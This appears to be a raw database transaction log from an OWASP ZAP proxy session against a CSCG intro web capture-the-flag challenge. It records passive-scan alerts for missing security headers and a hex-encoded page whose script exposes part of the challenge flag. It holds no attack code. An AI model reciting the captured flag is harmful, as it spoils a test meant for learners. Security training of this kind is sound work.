MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',26,26,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(87,42,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(88,42,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(68,573,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 69 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=67 -INSERT INTO BLOCKS VALUES(67,1,0) -INSERT INTO BLOCKS VALUES(68,2147483579,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=67 -INSERT INTO LOBS VALUES(67,1,0,68) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(68,1,'2024-03-02 03:35:25.224000',1,68,NULL,573,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=68 -INSERT INTO LOB_IDS VALUES(68,573,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(69,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 70 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=68 -INSERT INTO BLOCKS VALUES(68,1,0) -INSERT INTO BLOCKS VALUES(69,2147483578,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=68 -INSERT INTO LOBS VALUES(68,1,0,69) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(69,1,'2024-03-02 03:35:27.951000',1,69,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=69 -INSERT INTO LOB_IDS VALUES(69,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(70,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 71 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=69 -INSERT INTO BLOCKS VALUES(69,1,0) -INSERT INTO BLOCKS VALUES(70,2147483577,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=69 -INSERT INTO LOBS VALUES(69,1,0,70) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(70,1,'2024-03-02 03:35:37.956000',1,70,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=70 -INSERT INTO LOB_IDS VALUES(70,64,1,40) -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=0 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=1 -DELETE FROM ALERT_TAG WHERE TAG_ID=2 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=1 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=3 -DELETE FROM ALERT_TAG WHERE TAG_ID=4 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=1 -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(71,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 72 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=70 -INSERT INTO BLOCKS VALUES(70,1,0) -INSERT INTO BLOCKS VALUES(71,2147483576,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=70 -INSERT INTO LOBS VALUES(70,1,0,71) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(71,1,'2024-03-02 03:35:47.956000',1,71,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=71 -INSERT INTO LOB_IDS VALUES(71,64,1,40) -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=8 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=19 -DELETE FROM ALERT_TAG WHERE TAG_ID=20 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=7 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=9 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=21 -DELETE FROM ALERT_TAG WHERE TAG_ID=22 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=10 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=23 -DELETE FROM ALERT_TAG WHERE TAG_ID=24 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=8 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=11 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=25 -DELETE FROM ALERT_TAG WHERE TAG_ID=26 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=12 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=27 -DELETE FROM ALERT_TAG WHERE TAG_ID=28 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=9 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=13 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=29 -DELETE FROM ALERT_TAG WHERE TAG_ID=30 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=14 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=31 -DELETE FROM ALERT_TAG WHERE TAG_ID=32 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=10 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=15 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=33 -DELETE FROM ALERT_TAG WHERE TAG_ID=34 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=11 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=16 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=35 -DELETE FROM ALERT_TAG WHERE TAG_ID=36 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=17 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=37 -DELETE FROM ALERT_TAG WHERE TAG_ID=38 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=12 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=18 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=39 -DELETE FROM ALERT_TAG WHERE TAG_ID=40 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=19 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=41 -DELETE FROM ALERT_TAG WHERE TAG_ID=42 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=13 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=20 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=43 -DELETE FROM ALERT_TAG WHERE TAG_ID=44 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=21 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=45 -DELETE FROM ALERT_TAG WHERE TAG_ID=46 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=14 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=23 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=49 -DELETE FROM ALERT_TAG WHERE TAG_ID=50 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=15 -COMMIT -DELETE FROM HISTORY WHERE HISTORYID=16 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=25 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=53 -DELETE FROM ALERT_TAG WHERE TAG_ID=54 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=26 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=55 -DELETE FROM ALERT_TAG WHERE TAG_ID=56 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=17 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=27 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=57 -DELETE FROM ALERT_TAG WHERE TAG_ID=58 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=28 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=59 -DELETE FROM ALERT_TAG WHERE TAG_ID=60 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=18 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=30 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=63 -DELETE FROM ALERT_TAG WHERE TAG_ID=64 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=19 -COMMIT -DELETE FROM HISTORY WHERE HISTORYID=20 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=32 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=67 -DELETE FROM ALERT_TAG WHERE TAG_ID=68 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=33 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=69 -DELETE FROM ALERT_TAG WHERE TAG_ID=70 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=21 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=34 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=71 -DELETE FROM ALERT_TAG WHERE TAG_ID=72 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=35 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=73 -DELETE FROM ALERT_TAG WHERE TAG_ID=74 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=22 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=37 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=77 -DELETE FROM ALERT_TAG WHERE TAG_ID=78 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=23 -COMMIT -DELETE FROM HISTORY WHERE HISTORYID=24 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=39 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=81 -DELETE FROM ALERT_TAG WHERE TAG_ID=82 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=40 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=83 -DELETE FROM ALERT_TAG WHERE TAG_ID=84 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=25 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=41 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=85 -DELETE FROM ALERT_TAG WHERE TAG_ID=86 -COMMIT -/*C5*/DELETE FROM ALERT WHERE ALERTID=42 -COMMIT -/*C6*/DELETE FROM ALERT_TAG WHERE TAG_ID=87 -DELETE FROM ALERT_TAG WHERE TAG_ID=88 -COMMIT -/*C3*/DELETE FROM HISTORY WHERE HISTORYID=3 -COMMIT -DELETE FROM HISTORY WHERE HISTORYID=2 -COMMIT -DELETE FROM HISTORY WHERE HISTORYID=26 -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(72,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 73 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=71 -INSERT INTO BLOCKS VALUES(71,1,0) -INSERT INTO BLOCKS VALUES(72,2147483575,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=71 -INSERT INTO LOBS VALUES(71,1,0,72) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(72,1,'2024-03-02 03:35:57.957000',1,72,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=72 -INSERT INTO LOB_IDS VALUES(72,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(73,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 74 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=72 -INSERT INTO BLOCKS VALUES(72,1,0) -INSERT INTO BLOCKS VALUES(73,2147483574,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=72 -INSERT INTO LOBS VALUES(72,1,0,73) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(73,1,'2024-03-02 03:36:07.957000',1,73,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=73 -INSERT INTO LOB_IDS VALUES(73,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(74,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 75 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=73 -INSERT INTO BLOCKS VALUES(73,1,0) -INSERT INTO BLOCKS VALUES(74,2147483573,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=73 -INSERT INTO LOBS VALUES(73,1,0,74) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(74,1,'2024-03-02 03:36:17.963000',1,74,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=74 -INSERT INTO LOB_IDS VALUES(74,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(75,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 76 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=74 -INSERT INTO BLOCKS VALUES(74,1,0) -INSERT INTO BLOCKS VALUES(75,2147483572,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=74 -INSERT INTO LOBS VALUES(74,1,0,75) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(75,1,'2024-03-02 03:36:27.964000',1,75,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=75 -INSERT INTO LOB_IDS VALUES(75,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(76,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 77 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=75 -INSERT INTO BLOCKS VALUES(75,1,0) -INSERT INTO BLOCKS VALUES(76,2147483571,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=75 -INSERT INTO LOBS VALUES(75,1,0,76) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(76,1,'2024-03-02 03:36:37.967000',1,76,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=76 -INSERT INTO LOB_IDS VALUES(76,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(77,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 78 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=76 -INSERT INTO BLOCKS VALUES(76,1,0) -INSERT INTO BLOCKS VALUES(77,2147483570,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=76 -INSERT INTO LOBS VALUES(76,1,0,77) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(77,1,'2024-03-02 03:36:47.973000',1,77,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=77 -INSERT INTO LOB_IDS VALUES(77,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(78,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 79 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=77 -INSERT INTO BLOCKS VALUES(77,1,0) -INSERT INTO BLOCKS VALUES(78,2147483569,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=77 -INSERT INTO LOBS VALUES(77,1,0,78) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(78,1,'2024-03-02 03:36:57.976000',1,78,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=78 -INSERT INTO LOB_IDS VALUES(78,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(79,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 80 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=78 -INSERT INTO BLOCKS VALUES(78,1,0) -INSERT INTO BLOCKS VALUES(79,2147483568,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=78 -INSERT INTO LOBS VALUES(78,1,0,79) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(79,1,'2024-03-02 03:37:08.102000',1,79,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=79 -INSERT INTO LOB_IDS VALUES(79,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(80,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 81 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=79 -INSERT INTO BLOCKS VALUES(79,1,0) -INSERT INTO BLOCKS VALUES(80,2147483567,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=79 -INSERT INTO LOBS VALUES(79,1,0,80) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(80,1,'2024-03-02 03:37:18.133000',1,80,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=80 -INSERT INTO LOB_IDS VALUES(80,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(81,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 82 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=80 -INSERT INTO BLOCKS VALUES(80,1,0) -INSERT INTO BLOCKS VALUES(81,2147483566,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=80 -INSERT INTO LOBS VALUES(80,1,0,81) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(81,1,'2024-03-02 03:37:28.152000',1,81,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=81 -INSERT INTO LOB_IDS VALUES(81,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(82,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 83 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=81 -INSERT INTO BLOCKS VALUES(81,1,0) -INSERT INTO BLOCKS VALUES(82,2147483565,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=81 -INSERT INTO LOBS VALUES(81,1,0,82) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(82,1,'2024-03-02 03:37:38.962000',1,82,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=82 -INSERT INTO LOB_IDS VALUES(82,64,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(27,1709346750724,15,200,1709347068648,206,'GET','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html','GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html HTTP/1.1\u000d\u000ahost: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Windows 95; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aConnection: keep-alive\u000d\u000aReferer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/\u000d\u000aUpgrade-Insecure-Requests: 1\u000d\u000aSec-Fetch-Dest: document\u000d\u000aSec-Fetch-Mode: navigate\u000d\u000aSec-Fetch-Site: same-origin\u000d\u000aSec-Fetch-User: ?1\u000d\u000acontent-length: 0\u000d\u000a\u000d\u000a','','HTTP/1.1 200 OK\u000d\u000aServer: nginx/1.24.0\u000d\u000aDate: Sat, 02 Mar 2024 02:37:48 GMT\u000d\u000aContent-Type: text/html\u000d\u000aContent-Length: 1366\u000d\u000aLast-Modified: Thu, 01 Jan 1970 00:00:01 GMT\u000d\u000aConnection: keep-alive\u000d\u000aETag: "1-556"\u000d\u000aCache-Control: no-store\u000d\u000aAccept-Ranges: bytes\u000d\u000a\u000d\u000a','3c68746d6c3e0a3c686561643e0a202020203c7469746c653e496e74726f20746f2057656220323c2f7469746c653e0a202020203c6d65746120636861727365743d225554462d38223e0a202020203c6c696e6b2072656c3d227374796c6573686565742220747970653d22746578742f6373732220687265663d227374796c652e63737322202f3e0a3c2f686561643e0a3c626f64793e0a3c68313e24284745524d414e5f4349545929205472616d205469636b6574204d616368696e653c2f68313e0a0a3c68333e47657420796f7572203c7370616e207374796c653d22746578742d6465636f726174696f6e3a206c696e652d7468726f7567683b223e7469636b65743c2f7370616e3e20666c61672068657265213c2f68333e0a3c68723e0a57697468207468652068656c70206f66206f75722073746174652d6f662d7468652d61727420666c6f707079206469736b20737769746368696e6720726f626f74732c20796f752063616e206e6f772072656164207468652066697273740a70617274206f662074686520666c616720696e207265616c2074696d65210a3c703e0a466c6167207061727420312f343a203c7370616e207374796c653d22636f6c6f723a20677265656e3b20666f6e742d66616d696c793a2027436f7572696572204e6577272c206d6f6e6f73706163653b223e0a20202020435343477b3c7370616e2069643d22666c6167223e2e2e2e2e2e2e2e2e3c2f7370616e3e3c2f7370616e3e0a0a3c212d2d0a4e6f2074696d6520746f20776169742c2072696768743f0a2d2d3e0a0a3c7363726970743e0a666c6167203d20226c396a6a3535304b220a73796d626f6c7352657665616c6564203d20300a7761697454696d65203d20313030303b0a0a66756e6374696f6e206e65787453796d626f6c2829207b0a202020206966202873796d626f6c7352657665616c6564203e3d20666c61672e6c656e677468292072657475726e3b0a2020202073796d626f6c7352657665616c65642b2b3b0a0a202020207761697454696d65202a3d20323b0a2020202073657454696d656f7574286e65787453796d626f6c2c207761697454696d65293b0a7d0a0a66756e6374696f6e207370696e2829207b0a20202020636f6e737420666c616750617274203d20666c61672e73756273747228302c2073796d626f6c7352657665616c6564293b0a20202020636f6e737420616c706861626574203d2028224142434445464748494a4b4c4d4e4f5052535455565758595a61626364656668696b6c6d6e6f727374757677787a3031323334353637383922290a20202020636f6e73742072616e646f6d53796d626f6c203d0a202020202020202073796d626f6c7352657665616c6564203c20666c61672e6c656e6774680a2020202020202020202020203f20616c7068616265742e636861724174284d6174682e666c6f6f72284d6174682e72616e646f6d2829202a20616c7068616265742e6c656e67746829290a2020202020202020202020203a2022223b0a20202020636f6e737420737566666978203d20222e222e726570656174284d6174682e6d617828302c20666c61672e6c656e677468202d2031202d2073796d626f6c7352657665616c656429293b0a0a20202020646f63756d656e742e676574456c656d656e74427949642822666c616722292e696e6e657248544d4c203d20666c616750617274202b2072616e646f6d53796d626f6c202b207375666669783b0a7d0a0a73657454696d656f7574286e65787453796d626f6c2c207761697454696d65293b0a736574496e74657276616c287370696e2c203530293b0a3c2f7363726970743e0a0a3c2f626f64793e0a3c2f68746d6c3e',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(83,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 84 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=82 -INSERT INTO BLOCKS VALUES(82,1,0) -INSERT INTO BLOCKS VALUES(83,2147483564,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=82 -INSERT INTO LOBS VALUES(82,1,0,83) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(83,1,'2024-03-02 03:37:49.010000',1,83,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=83 -INSERT INTO LOB_IDS VALUES(83,64,1,40) -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=9 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Server' AND USED=2 AND FLAGS='' AND VALS='nginx/1.24.0' -INSERT INTO PARAM VALUES(9,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Server',3,'','nginx/1.24.0') -COMMIT -DELETE FROM PARAM WHERE PARAMID=10 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Date' AND USED=2 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT' -INSERT INTO PARAM VALUES(10,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Date',3,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:37:48 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=11 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Content-Type' AND USED=2 AND FLAGS='' AND VALS='text/html,text/plain' -INSERT INTO PARAM VALUES(11,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Content-Type',3,'','text/html,text/plain') -COMMIT -DELETE FROM PARAM WHERE PARAMID=12 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Content-Length' AND USED=2 AND FLAGS='' AND VALS='287,384' -INSERT INTO PARAM VALUES(12,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Content-Length',3,'','287,1366,384') -COMMIT -DELETE FROM PARAM WHERE PARAMID=15 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Last-Modified' AND USED=1 AND FLAGS='' AND VALS='Thu%2C 01 Jan 1970 00:00:01 GMT' -INSERT INTO PARAM VALUES(15,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Last-Modified',2,'','Thu%2C 01 Jan 1970 00:00:01 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=13 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Connection' AND USED=2 AND FLAGS='' AND VALS='keep-alive' -INSERT INTO PARAM VALUES(13,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Connection',3,'','keep-alive') -COMMIT -DELETE FROM PARAM WHERE PARAMID=14 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='ETag' AND USED=2 AND FLAGS='' AND VALS='"1-180","1-11f"' -INSERT INTO PARAM VALUES(14,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','ETag',3,'','"1-180","1-11f","1-556"') -COMMIT -DELETE FROM PARAM WHERE PARAMID=16 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Cache-Control' AND USED=1 AND FLAGS='' AND VALS='no-store' -INSERT INTO PARAM VALUES(16,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Cache-Control',2,'','no-store') -COMMIT -DELETE FROM PARAM WHERE PARAMID=17 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Accept-Ranges' AND USED=1 AND FLAGS='' AND VALS='bytes' -INSERT INTO PARAM VALUES(17,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Accept-Ranges',2,'','bytes') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(43,0,10020,'Missing Anti-clickjacking Header',2,2,'The response does not include either Content-Security-Policy with ''frame-ancestors'' directive or X-Frame-Options to protect against ''ClickJacking'' 